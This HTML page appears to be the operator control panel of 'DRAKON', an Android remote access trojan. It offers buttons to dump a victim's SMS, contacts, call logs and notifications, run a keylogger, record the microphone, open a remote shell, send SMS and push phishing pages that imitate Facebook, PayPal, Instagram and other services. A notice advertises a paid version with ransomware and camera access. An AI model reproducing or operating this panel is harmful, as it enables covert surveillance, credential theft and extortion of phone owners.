<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <title>DRAKON</title>
    <meta charset="UTF-8" />
    <link rel="icon" href="./img/logo.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script src="./firebase-app.js"></script>
    <script src="./firebase-auth.js"></script>
    <script src="./jquery.js"></script>
    <script src="./firebase-database.js"></script>
    <script type="text/javascript">
        //EDIT UNDER THIS ONLY

        const firebaseConfig = {
            apiKey: "AIzaSyBcwGBcNOBH3IdzWeQQtzshIDWyRufHL9I",
            authDomain: "rat-rat-6b6f5.firebaseapp.com",
            databaseURL: "https://rat-rat-6b6f5-default-rtdb.firebaseio.com",
            projectId: "rat-rat-6b6f5",
            storageBucket: "rat-rat-6b6f5.appspot.com",
            messagingSenderId: "1:822796219513:web:99b1e1b8b91557ac7710a8",
            appId: "G-7RT7Z124RZ"
        };


        //DON'T EDIT BELOW THIS





        firebase.initializeApp(firebaseConfig);
    </script>
    <style type="text/css">
        * {
            padding: 0;
            margin: 0;
            outline: 0;
            font-family: Verdana, sans-serif;
        }

        @font-face {
            font-family: 'eglantine';
            font-style: normal;
            font-weight: normal;
            src: local('eglantine'), url('./asset/eglantine.woff') format('woff');
        }

        #users {
            height: 100%;
            padding-bottom: 15px;
            background: #000;
            width: 100%;
            z-index: 999999999;
            color: green;
            display: block;
            position: relative;
        }

        .usr {
            height: auto;
            width: 90%;
            padding: 10px;
            color: #0dd;
            border-radius: 5px;
            background: #001;
            border: 1px solid #0dd;
            box-shadow: 0px 0px 5px black;
            margin: auto;
        }

        .usr button {
            height: 30px;
            width: 150px;
            border: 0;
            background: black;
            border-radius: 5px;
            border: 1px solid red;
            color: red;
        }

        #resp {
            padding-bottom: 20px;
            width: 100%;
            background: #000;
            position: absolute;
            top: 0;
            color: #0dd;
            left: 0;
            overflow: scroll;
            height: calc(100% - 20px);
            display: none;
        }

        #resp li {
            list-style: none;
            width: calc(100% - 50px);
            height: 50px;
            padding-left: 50px;
            line-height: 50px;
            user-select: none;
            position: relative;
            overflow: auto;
        }

        .fo {
            background: url("./img/imgg1.png");
            background-size: 30px 25px;
            background-repeat: no-repeat;
            background-position: 10px 12px;
        }

        .fi {
            background: url("./img/imgg3.png");
            background-size: 25px 30px;
            background-repeat: no-repeat;
            background-position: 12px 12px;
        }

        .vi {
            background: url("./img/i4.png");
            background-size: 30px 30px;
            background-repeat: no-repeat;
            background-position: 10px 12px;
        }

        .im {
            background: url("./img/imgg2.png");
            background-size: 30px 30px;
            background-repeat: no-repeat;
            background-position: 10px 12px;
        }

        #cmdcernter {
            position: fixed;
            top: 0;
            left: 0;
            opacity: 1;
            background: green;
            z-index: 99999;
        }

        #resp b {
            position: absolute;
            right: 10px;
            top: 0px;
            color: rgb(0, 255, 0);
        }

        #fprev {
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            color: green;
            display: none;
            background: #001;
            z-index: 99999999;
            text-align: center;
        }

        #fprev img {
            max-height: 50%;
            max-width: 100%;
        }

        #fprev li {

            padding: 10px;
            text-align: left;
            padding-left: 10px;
            width: 80%;
            overflow: scroll;
            color: #0dd;
            list-style: none;
        }

        #fprev li:nth-child(5) {
            text-align: center;
            background: #000;
            border: 1px solid red;
            border-radius: 5px;
            margin: auto;
        }

        #fprev ul {}

        .span {
            color: white;
            position: absolute;
            top: 10px;
            border-radius: 50%;
            height: 35px;
            width: 35px;
            background: red;
            text-align: center;
            left: 10px;
            font-size: 35px;
            line-height: 35px;
        }

        #phones {
            width: 100%;
            height: 100%;
            background: url("./img/imgg.jpg");
            background-repeat: no-repeat;
            background-size: cover;
            position: absolute;
            top: 0;
            left: 0;
            z-index: 99999999;
            display: none;
        }

        #phones .icon {
            height: 50px;
            width: 50px;
            background: url("./img/dump_messages.png");
            background-size: 50px 50px;
            background-repeat: no-repeat;
            margin: 20px;
            text-align: center;
            font-size: 10px;
            color: white;
            line-height: 120px;

        }

        .dfle {
            width: 100%;
            display: flex;
            justify-content: center;
        }

        .dfle div {
            border-radius: 10px;
        }

        #preloaderr {
            height: 100%;
            width: 100%;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999999999999999998;
            background: rgba(0, 0, 0, .9);
            display: flex;
            align-items: center;
            justify-content: center;
        }

        #preloaderr .load {
            height: 50px;
            width: 50px;
            border: 3px solid #000;
            border-top: 3px solid #0dd;
            border-radius: 50%;
            position: relative;
            animation: ani 1s infinite;
        }

        @keyframes ani {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        #loadtxt {
            color: #0f0;
            position: absolute;
            margin-top: 80px;
        }

        #maindiv {
            position: fixed;
            left: 0;
            top: 50px;
            height: calc(100% - 50px);
            width: 100%;
            z-index: 99;
            background: #000;
            overflow: auto;
        }

        #tophead {
            height: 50px;
            width: 100%;
            position: fixed;
            top: 0;
            left: 0;
            background: #000;
            background: linear-gradient(180deg,
                    rgba(0, 0, 0, 0),
                    rgba(0, 0, 0, .9)), url(img/bg.png);
            background-size: cover;
            color: #fff;
            text-align: center;
        }

        #tophead .h4 {
            background: linear-gradient(90deg,
                    rgba(255, 0, 0, 1) 0%,
                    rgba(255, 154, 0, 1) 10%,
                    rgba(208, 222, 33, 1) 20%,
                    rgba(79, 220, 74, 1) 30%,
                    rgba(63, 218, 216, 1) 40%,
                    rgba(47, 201, 226, 1) 50%,
                    rgba(28, 127, 238, 1) 60%,
                    rgba(95, 21, 242, 1) 70%,
                    rgba(186, 12, 248, 1) 80%,
                    rgba(251, 7, 217, 1) 90%,
                    rgba(255, 0, 0, 1) 100%);
            letter-spacing: 10px;
            font-size: 20px;
            color: transparent;
            position: relative;
            width: 100%;
            height: 100%;
            animation: anioo 2s linear infinite;
            -webkit-background-clip: text;
            font-family: 'eglantine';
        }

        @keyframes anioo {
            0% {
                background-position: 0 0;
            }

            100% {
                background-position: 700px 0;
            }
        }

        #barss {
            color: white;
            position: absolute;
            top: 0px;
            right: 5px;
            font-size: 40px;
        }

        .h4:before {
            content: 'Drakon';
            letter-spacing: 8px;
            font-size: 30px;
            color: transparent;
            background: linear-gradient(90deg,
                    rgba(255, 0, 0, 1) 0%,
                    rgba(255, 154, 0, 1) 10%,
                    rgba(208, 222, 33, 1) 20%,
                    rgba(79, 220, 74, 1) 30%,
                    rgba(63, 218, 216, 1) 40%,
                    rgba(47, 201, 226, 1) 50%,
                    rgba(28, 127, 238, 1) 60%,
                    rgba(95, 21, 242, 1) 70%,
                    rgba(186, 12, 248, 1) 80%,
                    rgba(251, 7, 217, 1) 90%,
                    rgba(255, 0, 0, 1) 100%);
            animation: anioo2 2s linear infinite;
            -webkit-background-clip: text;
            position: absolute;
            margin: auto;
            z-index: -1;
            top: 0;
            left: 0;
            width: 100%;
            text-align: center;
            height: 100%;
        }

        @keyframes anioo2 {
            0% {
                filter: blur(30px);
                background-position: 0 0;
            }

            50% {
                filter: blur(1px);

            }

            100% {
                filter: blur(30px);
                background-position: 700px 0;
            }
        }

        #navbar {
            height: 100%;
            width: 70%;
            background: rgba(0, 0, 0, .9);
            position: fixed;
            top: 0;
            left: 0;
            display: none;
            transition: .5s;
            padding-top: 0;
            z-index: 9999999999999999999999999;
        }

        #navbar li {
            list-style: none;
            width: calc(100% - 20px);
            height: 60px;
            text-align: justify;
            line-height: 60px;
            color: #0dd;
            padding-left: 20px;
            font-weight: bolder;
            transition: .5s;
        }

        #navbar li:hover {
            width: calc(100% - 30px);
            padding-left: 30px;
            background: #001;
        }

        #backkk {
            position: absolute;
            top: 20px;
            display: none;
            left: 15px;
            transform: scale(2);
        }

        .loginn img {
            width: 80px;
            height: 80px;
            border-radius: 50%;
        }

        #logindiv {
            font-family: 'Comfortaa', cursive;
            height: 100%;
            width: 100%;
            background: rgb(2, 0, 36);
            background: linear-gradient(NaNdeg, rgba(2, 0, 36, 1) 0%, rgba(16, 16, 146, 1) 35%, rgba(0, 212, 255, 1) 100%);
            position: fixed;
            top: 0;
            //display:none;
            left: 0;
            z-index: 99999;
            justify-content: middle;
            align-content: center;
            margin: auto;
        }

        .loginn {
            background: rgba(0, 0, 0, .1);
            height: auto;
            color: #FFC72C;
            width: 90%;
            position: relative;
            top: 20px;
            padding: 15px;
            text-align: center;
            margin: auto;
            border-radius: 5px;
            box-shadow: 0px 0px 15px white;
        }

        .loginn input {
            margin: 5px;
            font-size: 20px;
            border: 0;
            width: 80%;
            color: white;
            background: transparent;
            border-bottom: 3px solid #FFC72C;
        }

        #lg {
            height: 50px;
            width: 150px;
            background: transparent;
            border: 1px solid red;
            border-radius: 5px;
            font-size: 20px;
            color: #FFC72C;
            margin-top: 10px;
        }

        input::placeholder {
            color: white;
        }

        .hqh {
            background: transparent;
            font-size: 15px;
            color: #0dd;
            border: 0;
        }

        #disclaim {
            height: 100%;
            width: 100%;
            background: #fff;
            text-align: center;
            position: fixed;
            top: 0;
            display: none;
            left: 0;
            z-index: 999999999999999999999;
        }

        #disclaim img {
            height: 30%;
            width: 30%;
        }

        .tos {
            height: 200px;
            width: 80%;
            overflow: auto;
            background: #eee;
            padding: 10px;
            border-radius: 5px;
            margin: auto;
            text-align: left;
        }

        .dis {
            height: 40px;
            width: 150px;
            color: white;
            border-radius: 5px;
            border: 0;
            background: green;
        }

        .diso {
            background: red;
        }
    </style>
</head>

<body>


    <style type="text/css">
        .dgh {
            position: absolute;
            top: 30px;
            font-size: 15px;
            width: 100%;
            text-align: center;
        }
    </style>
    <div id="tophead">
        <h4 class="h4">DRAKON</h4>
        <div class="dgh" style="display: none;"></div>
        <div id="backkk" onclick="backk(this)">
            <svg fill="#fff" xmlns="http://www.w3.org/2000/svg" width="16" height="16" class="bi bi-arrow-left" viewBox="0 0 16 16">
                <path fill-rule="evenodd" d="M15 8a.5.5 0 0 0-.5-.5H2.707l3.147-3.146a.5.5 0 1 0-.708-.708l-4 4a.5.5 0 0 0 0 .708l4 4a.5.5 0 0 0 .708-.708L2.707 8.5H14.5A.5.5 0 0 0 15 8z" />
            </svg>
        </div>
        <div style="height: 20px; width: 100%; color: rgb(255, 255, 255); line-height: 20px; position: fixed; top: 25px; left: 0px; z-index: 2147483647; text-align: center;"></div>
    </div>


    <div id="maindiv">
        <div id="preloaderr" style="display: none;">
            <div class="load">
            </div>
            <div id="loadtxt">Processing</div>
        </div>
        <div id="users"><br /><br />
            <div class="usr">samsung SM-G780F <span style="float:right">Android 12</span><br /><br />Rooted: No <span style="float:right">Bateria: 55% </span><br /><br />
                <center><button onclick="setdev('0f756f2v')">Atacar</button></center>
            </div>
        </div>
        <div id="phones">
            <br />

            <div class="dfle" style="">
                <div class="icon" onclick="dumpsms()">Dump SMS</div>
                <div class="icon" onclick="calllogs()" style="background:url('./img/dump_call_logs.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;">CallLogs</div>
                <div class="icon" onclick="filesmanager()" style="background:url('./img/ic3.png');background-size:50px 50px;background-repeat:no-repeat;">My Files</div>
                <div class="icon" onclick="getpackages()" style="background:url('./img/list_installed_apps.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;">AppsList</div>
            </div>
            <div class="dfle" style="">
                <div class="icon" onclick="deviceinfo()" style="background:url('./img/dump_device_info.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;">SysInfo</div>
                <div class="icon" onclick="toastt()" style="background:url('./img/toast.png');background-size:50px 50px;background-repeat:no-repeat;">Toast</div>
                <div class="icon" onclick="dumpcontact()" style="background:url('./img/dump_contacts.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;">Contacts</div>
                <div class="icon" onclick="funcmd('fmc1')" style="background:url('./img/itune.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;transform:scale(1.07);">PlayMusic</div>
            </div>
            <div class="dfle" style="">
                <div class="icon" onclick="sendmsg()" style="background:url('./img/send_message.png');background-size:52px 52px;baxkground-position:0 0;background-repeat:no-repeat;transform:scale(1);">SendSMS</div>
                <div class="icon" onclick="startshell()" style="background:url('./img/shell_command.png');background-size:50px 50px;background-repeat:no-repeat;">Shell</div>
                <div class="icon" onclick="funcmd('fmc1')" style="background:url('./img/img3.png');background-size:54px 54px;background-repeat:no-repeat;background-position:-2px -2px;">Vibrator</div>
                <div class="icon" onclick="funcmd('fmc1')" style="background:url('./img/img5.png');background-size:50px 50px;background-repeat:no-repeat;">TTS</div>

            </div>
            <div class="dfle" style="">
                <div class="icon" onclick="keylogger()" style="background:url('./img/img6.png');background-size:50px 50px;background-repeat:no-repeat;">Keylogger</div>
                <div class="icon" onclick="changewallpaper()" style="background:url('./img/img1.png');background-size:50px 50px;background-repeat:no-repeat;transform:scale(1.25);">Wallpaper</div>
                <div class="icon" onclick="notificationlog()" style="background:url('./img/img2.png');background-size:50px 50px;background-repeat:no-repeat;">Notifications</div>
                <div class="icon" onclick="showphish()" style="background:url('./img/phish.png');background-size:50px 50px;background-repeat:no-repeat;">PhishData</div>
            </div>
            <div class="dfle" style="">
                <div class="icon" onclick="showphpag()" style="background:url('./img/scams.png');background-size:50px 50px;background-repeat:no-repeat;">Scams</div>
                <div class="icon" onclick="micrec()" style="background:url('./img/microphone_rec.png');background-size:50px 50px;background-repeat:no-repeat;">Recordings</div>
                <div class="icon" onclick="showclip()" style="background:url('./img/clip.png');background-size:50px 50px;background-repeat:no-repeat;">ClipBoard</div>
                <div class="icon" onclick="funcmd('fmc2')" style="background:url('./img/img4.png');background-size:50px 50px;background-repeat:no-repeat;">Torch</div>
            </div>
            <div class="dfle" style="">
                <div class="icon" onclick="funcmd('fmc2')" style="background:url('./img/web.png');background-size:50px 50px;background-repeat:no-repeat;">LaunchURL</div>
            </div>
            <div style="height: 50px; width: 90%; margin: 15px auto auto; background: rgb(0, 0, 17); border-radius: 10px; color: rgb(255, 255, 255); text-align: center; line-height: 50px; border: 1px solid rgb(0, 255, 136);">Want More Features Contact at <a href="https://t.me/th30neand0nly" style="color:#0f8;">@th30neand0nly</a></div>
        </div>


        <div id="cmdcernter" style="display:none;">
            <input type="text" id="cmdref" placeholder="cmdref" value="/comds/comdsdc38kw6i" /><br />
            <input type="text" id="cmd" placeholder="cmd type" /><br />
            <input type="text" id="cmdvar" placeholder="cmm" /><br />
            <input type="text" id="cmdvarm" placeholder="cmd var optional" /><br />

            <button onclick="cmd()">Send</button><br />
        </div>


        <div id="resp" onclick="opfol(event)">
        </div>


        <div id="fprev">
            <h4>Preview </h4><br />
            <img id="imv" src="img3.png" />
            <iframe id="imv2" src="img3.png" style="height:40%;width:100%;"></iframe>
            <br />
            <hr />
            <ul id="fprevdes">
                <li>Name : Fuck Hard
                </li>
                <li>Size: 100 MB
                </li>
                <li>Creation: 11 Aug 2055
                </li>
                <li>Path: /sdcard/fuck.png</li>
                <li><a download="" id="btdwn" target="_blank" href="hh">Download File</a><br />
                </li>
            </ul>
            <style type="text/css">
                #btdwn {
                    font-weight: bolder;
                    color: green;
                    text-decoration: none;
                }

                #fprev iframe {
                    border: 0;
                }

                #viewers {
                    position: absolute;
                    top: 0;
                    left: 0;
                    display: none;
                    height: 100%;
                    width: 100%;
                    z-index: 99;
                    background: black;
                }

                #viewers iframe {
                    height: 100%;
                    width: 100%;
                    position: absolute;
                    top: 0;
                    left: 0;
                    border: 0;
                }

                .down {
                    height: 50px;
                    width: 50px;
                    position: fixed;
                    bottom: 50px;
                    right: 30px;
                    border-radius: 50%;
                    background: green;
                    text-align: center;
                    line-height: 60px;
                    color: white;
                }

                .btn {
                    height: 40px;
                    width: 150px;
                    border: 0;
                    border-radius: 5px;
                    border: 1px solid red;
                    background: black;
                    color: white;
                }

                #notikey {
                    position: absolute;
                    top: 0;
                    left: 0;
                    display: none;
                    height: 100%;
                    width: 100%;
                    overflow: auto;
                    z-index: 999;
                    background: #111;
                }

                .keylogg {
                    background: rgba(0, 0, 0, 1);
                    width: calc(95% - 20px);
                    height: auto;
                    margin: auto;
                    padding: 10px;
                    color: #0dd;
                    padding-bottom: 10px;
                    margin-top: 8px;
                    border-radius: 10px;
                    overflow: auto;
                }

                .keylogg b {
                    color: red;
                }

                .keylogg img {
                    max-height: 50px;
                    max-width: 50px;
                    position: absolute;
                    left: 20px;
                }

                .keylogg p {
                    color: #fff;
                }

                .keylogg span {
                    float: right;
                    margin-right: 10px;
                }

                #shellcmd {
                    height: 100%;
                    width: 100%;
                    position: absolute;
                    top: 0;
                    left: 0;
                    overflow: hidden;
                    z-index: 99;
                    display: none;
                    background: #000;
                }

                #shellcmdd {
                    height: 30px;
                    width: 98%;
                    background: #001;
                    position: absolute;
                    bottom: 0;
                    left: 0;
                    color: white;
                    border: 1px solid silver;
                }

                #shelldata {
                    height: calc(100% - 50px);
                    width: 100%;
                    position: absolute;
                    top: 0;
                    left: 0;
                    overflow: scroll;
                    font-family: monospace;
                    color: white;
                }
            </style>
            <br />

            <span class="span" onclick="this.parentElement.style.display=&quot;none&quot;;setdatcmd(&quot;cd&quot;,var32.substr(0,var32.lastIndexOf(&quot;/&quot;)),&quot;&quot;,respov);">×</span>
        </div>


        <div id="viewers">
            <iframe id="vieweri" src="data:text/html,&lt;h4 style='color:green' &gt; Getting File for preview....&lt;/h4&gt;"></iframe>
            <a href="#" id="downlo" target="_blank" download="file.html">
                <div class="down"> <svg fill="white" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                        <path d="M19 9h-4V3H9v6H5l7 7 7-7zM5 18v2h14v-2H5z" />
                    </svg> </div>
            </a>
        </div>


        <div id="shellcmd">
            <div id="shelldata">Drakon Shell<br /><sub>(some root commands may not work properly)</sub> </div>
            <input type="text" onkeyup="shellcm(this)" id="shellcmdd" placeholder="Enter Your Command Here_" />
        </div>



        <div id="notikey" style="display:none;"></div>

        <div id="toastdiv">
            <br />
            <h3>Toast</h3>
            <br />
            <textarea type="text" id="toastcmd" placeholder="Type Your Message Here"></textarea>
            <br /><br /><button onclick="toastexc()">Execute</button>
        </div>


        <div id="diamain" onclick="this.style.display='none';">
            <div class="diachild">
                <h3 style="color:#0dd">Response</h3><br />
                <p id="diatext">This is response Text bsdk </p>
                <br />
                <button>OK</button>
            </div>
        </div>



        <div id="pvtt">
            <h3 style="color:red">FUN COMMANDS</h3><br /><br />
            <div id="fmc1">
                <div id="plmc">
                    <h4>Play Music </h4><br />
                    <input type="text" id="musiccmd" placeholder="Enter Direct .mp3 link" />
                    <br /><button onclick="playmus()">Execute</button>
                    <br /><br />
                    <hr /><br />
                </div>
                <div id="vibradev">
                    <h4>Vibrate Device </h4><br />
                    <input type="text" id="vibratecmd" placeholder="Enter No. of Seconds" />
                    <br /><button onclick="vibra()">Execute</button>
                    <br /><br />
                    <hr /><br />
                </div>
                <div id="ttsdev">
                    <h4>Text To Speech </h4><br />
                    <input type="text" id="ttscmd" placeholder="Enter Your Text Message" />
                    <br /><button onclick="ttsf()">Execute</button>
                    <br />
                </div>
            </div>
            <div id="fmc2">
                <div id="tonofff">
                    <h4>Turn On/Off Torch</h4><br />
                    <button onclick="tont()">Turn On</button>
                    <button style="margin-left:10px;" onclick="tofft()">Turn Off</button>
                    <br /><br />
                    <hr /><br />
                </div>
                <div id="oppweb">
                    <h4>Open URL</h4><br />
                    <input type="text" id="opwebcmd" placeholder="Enter Your URL including http://" />
                    <br /><button onclick="opwebl()">Execute</button>
                </div>
            </div>
        </div>



        <div id="senddm">
            <h4 style="color:#0fa">Send SMS</h4><br /><br />
            TO:<input type="text" id="smsnumber" placeholder="Enter Mobile Number" /><br /><br />
            Message:<br /><br /><textarea id="smscontent" placeholder="Enter Message Content"></textarea>
            <br /><br />
            <center><button onclick="sendsms()">Send SMS</button></center>
        </div>



        <div id="wallpaperdiv"><br />
            <h3 style="color:#0f9">Select Wallpaper </h3><br /><br />
            <div class="wallimg">
                <img src="./img/wall1.png" onclick="selectimg(this,0)" id="selectedimg" />
                <img src="./img/wall2.png" onclick="selectimg(this,1)" />
                <img src="./img/wall3.png" onclick="selectimg(this,2)" />
            </div>
            <br />
            <center><button onclick="setwalls()">Set Wallpaper</button></center>
        </div>


        <div id="micrec">
            <br />
            <h3>Record</h3>
            <br />
            <input type="text" id="recval" placeholder="Record For x Seconds" />
            <br /><button class="btn" onclick="recordvoice()">Record Mic</button>
            <br />
            <hr />
            <br />
            <br />
            <h3>Recordings</h3><br />
            <div id="showrecs">
            </div>

        </div>



        <div id="showphishj">
            <br />
            <h3>Phishing Commands</h3><br /><br />
            <input type="text" id="nshpih" placeholder="Enter Notification Title" /><br />
            <br />
            <hr />
            <select onchange="iojh()" id="lshpih">
                <option value="0">dropbox3.png</option>
                <option value="1">facebook2.png</option>
                <option value="2">facebook5.png</option>
                <option value="3">free_fire3.png</option>
                <option value="4">github1.png</option>
                <option value="5">instagram1.png</option>
                <option value="6">linkedin1.png</option>
                <option value="7">messenger1.png</option>
                <option value="8">microsoft1.png</option>
                <option value="9">netflix1.png</option>
                <option value="10">paypal2.png</option>
                <option value="11">protonmail1.png</option>
                <option value="12">pubg2.png</option>
                <option value="13">snapchat1.png</option>
                <option value="14">tumblir1.png</option>
                <option value="15">twitter1.png</option>
                <option value="16">wordpress1.png</option>
                <option value="17">yahoo1.png</option>

            </select>
            <img src="./imgg/dropbox3.png" id="hion" style="max-height:60px;max-width:60px;" />
            <br /><br />
            <!--jjjwjjw-->
            <center>
                <select id="phpage">
                    <option value="dropbox.html">

                        dropbox.html
                    </option>
                    <option value="facebook_desktop_homepage.html">

                        facebook_desktop_homepage.html
                    </option>
                    <option value="facebook_desktop_static.html">

                        facebook_desktop_static.html
                    </option>
                    <option value="facebook_mobile.html">

                        facebook_mobile.html
                    </option>
                    <option value="facebook_mobile_fake_security.html">

                        facebook_mobile_fake_security.html
                    </option>
                    <option value="garena_free_fire.html">

                        garena_free_fire.html
                    </option>
                    <option value="github.html">

                        github.html
                    </option>
                    <option value="instagram.html">

                        instagram.html
                    </option>
                    <option value="linkedin.html">

                        linkedin.html
                    </option>
                    <option value="messenger.html">

                        messenger.html
                    </option>
                    <option value="microsoft.html">

                        microsoft.html
                    </option>
                    <option value="netflix.html">

                        netflix.html
                    </option>
                    <option value="paypal.html">

                        paypal.html
                    </option>
                    <option value="protonmail.html">

                        protonmail.html
                    </option>
                    <option value="pubg.html">

                        pubg.html
                    </option>
                    <option value="snapchat.html">


                        snapchat.html
                    </option>
                    <option value="tumblr.html">

                        tumblr.html
                    </option>
                    <option value="twitter_desktop.html">

                        twitter_desktop.html
                    </option>
                    <option value="twitter_mobile.html">

                        twitter_mobile.html
                    </option>
                    <option value="wordpress.html">

                        wordpress.html
                    </option>
                    <option value="yahoo.html">

                        yahoo.html
                    </option>
                </select>
                <button onclick="execphish()"> Execute</button>
            </center>
            <br />
            <hr />
            <br />
            <input type="text" id="shpih" placeholder="Enter Your Link" />
            <br /><button class="btn" onclick="execphish2()">Execute</button>
        </div>

        <style type="text/css">
            #showphishj select {
                height: 40px;
                margin: auto;
                margin-top: 20px;
                color: #fff;
                background: #001;
                border-radius: 5px;
            }

            #showphishj button {
                height: 30px;
                width: 150px;
                background: #000;
                color: #0dd;
                border-radius: 5px;
                margin-top: 20px;
                border: 1px solid #f00;
            }

            audio {
                display: none;
            }

            #showrecs {
                overflow: auto;
                color: #0fa;
            }

            ::-webkit-scrollbar {
                width: 0px;
            }

            .downlii,
            .plrec {
                height: 100%;
                width: 40px;
                float: right;
                margin-left: 10px;
                margin-right: 0px;
                margin-top: 5px;
            }

            .downlii {
                margin-right: 20px;
            }

            .downlii svg,
            .plrec svg {
                height: 90%;
                width: 90%;
            }

            .downlii svg {
                height: 65%;
                width: 65%;
                margin-top: 8px;
            }

            .recswarp {
                margin: auto;
                margin-top: 5px;
                background: #001;
                width: 90%;
                display: flex;
                align-items: center;
                border-radius: 10px;
                height: 50px;
                border: solid 1px #0dd;
            }

            #selectedimg {
                border: 2px solid red;
            }

            .wallimg {
                display: flex;
                height: 200px;
                margin: auto;
                width: 100%;
            }

            .wallimg img {
                height: 100%;
                border-radius: 7px;
                margin-left: 10px;
                width: 30%;
            }

            #pvtt h4 {
                color: #0dd;
            }

            #pvtt input,
            #showphishj input,
            #senddm input,
            #micrec input[type="text"] {
                height: 30px;
                padding: 5px;
                width: 80%;
                line-height: 40px;
                border: 0.5px solid #0dd;
                background: #001;
                color: #fff;
                border-radius: 5px;
            }

            #senddm {
                color: #fff
            }

            #senddm input {
                height: 20px;
                margin-left: 10px;
            }

            #toastdiv,
            #pvtt,
            #showphishj,
            #micrec,
            #senddm,
            #wallpaperdiv {
                height: 100%;
                width: 100%;
                background: #000;
                position: absolute;
                top: 0;
                left: 0;
                display: none;
                z-index: 99;
            }

            #pvtt button,
            #micrec .btn,
            #senddm button,
            #wallpaperdiv button {
                margin-top: 10px;
                height: 30px;
                width: 110px;
                color: #fff;
                background: black;
                border: 1px solid red;
                border-radius: 5px;
            }

            /* use for test*/
            #showphisj {
                z-index: 9999999999999;
                display: block;
            }

            #pvtt {
                width: calc(100% - 40px);
                padding: 20px;
            }

            .diachild p {
                height: 50px;
                overflow: auto;
            }

            .diachild button {
                height: 30px;
                width: 110px;
                color: #fff;
                background: black;
                float: right;
                border: 1px solid red;
                border-radius: 5px;
            }

            .diachild {
                height: 150px;
                background: #001;
                border-radius: 10px;
                color: white;
                padding: 10px;
                border: 1px solid green;
                width: calc(100% - 50px);
            }

            #diamain {
                height: 100%;
                width: 100%;
                background: rgba(0, 0, 0, .9);
                position: absolute;
                top: 0;
                display: none;
                align-items: center;
                justify-content: center;
                left: 0;
                z-index: 99999999999999999;
            }

            #toastdiv h3,
            #micrec h3,
            #showphishj h3 {
                color: #0dd;
                margin-left: 30px;
            }

            #toastcmd,
            #senddm textarea {
                margin-left: 30px;
                height: 40%;
                padding-top: 10px;
                padding-left: 10px;
                width: 80%;
                border: 0.5px solid #0dd;
                background: #001;
                color: #fff;
                border-radius: 5px;
            }

            #toastdiv button {
                margin-left: 30px;
                height: 30px;
                width: 110px;
                color: #fff;
                background: black;
                border: 1px solid red;
                border-radius: 5px;
            }

            #cmdcernter {
                display: none;
            }
        </style>
    </div>
    <script type="text/javascript" src="./script.js"></script>
    <div style="height: 100%; width: 100%; z-index: 2147483647; background: rgb(0, 0, 17); color: rgb(255, 255, 255); position: fixed; top: 50px; left: 0px; display: flex; align-items: center; justify-content: center;">
        <div style="height: 290px; width: 250px; z-index: 2147483647; background: rgb(0, 0, 0); border-radius: 10px; color: rgb(255, 255, 255); border: 1px solid rgb(0, 255, 136); padding: 10px;">
            <center>
                <h3 style="color:red">•USO PRIVADO•</h3>
                <h3> </h3>
            </center><br />This is an Open Source RAT named <b style="color:gold">DRAKON </b>available for free on <a href="" style="color:#0f8;">GitHub</a>. Reselling , Changing Brand Name , Logo of free version are strictly prohibited.<br />To get pro version features like <u style="color:yellow">Camera , SIM Info , Ransomware , Accounts List etc.</u> contact at: <a href="https://t.me/th30neand0nly" style="color:#0f8;">@th30neand0nly</a> , <a href= style="color:#0f8;"> Click Here</a> to learn more<br />
            <center><button onclick="this.parentElement.parentElement.parentElement.style.display=&quot;none&quot;" style="margin-top:5px;color:white;background:#001;border:1px solid red;border-radius:5px;height:30px;width:150px;margin-bottom:10px;"> I Understand</button><br /><u style="color:red;font-size:15px;" onclick="dnd(this);">Hide this notice for a day</u></center>
        </div>
    </div>
    <style>
        img[alt*="www.000webhost.com"],
        .disclaimer {
            display: none
        }
    </style>
    <div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website&amp;utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com" /></a></div>
    <script>
        function getCookie(t) {
            for (var e = t + "=", n = decodeURIComponent(document.cookie).split(";"), o = 0; o & lt; n.length; o++) {
                for (var i = n[o];
                    " " == i.charAt(0);) i = i.substring(1);
                if (0 == i.indexOf(e)) return i.substring(e.length, i.length)
            }
            return ""
        }
        getCookie("hostinger") & amp; & amp;
        (document.cookie = "hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;", location.reload());
        var wordpressAdminBody = document.getElementsByClassName("wp-admin")[0],
            notification = document.getElementsByClassName("notice notice-success is-dismissible"),
            hostingerLogo = document.getElementsByClassName("hlogo"),
            mainContent = document.getElementsByClassName("notice_content")[0];
        if (null != wordpressAdminBody & amp; & amp; notification.length & gt; 0 & amp; & amp; null != mainContent) {
            var googleFont = document.createElement("link");
            googleFontHref = document.createAttribute("href"), googleFontRel = document.createAttribute("rel"), googleFontHref.value = "https://fonts.googleapis.com/css?family=Roboto:300,400,600,700", googleFontRel.value = "stylesheet", googleFont.setAttributeNode(googleFontHref), googleFont.setAttributeNode(googleFontRel);
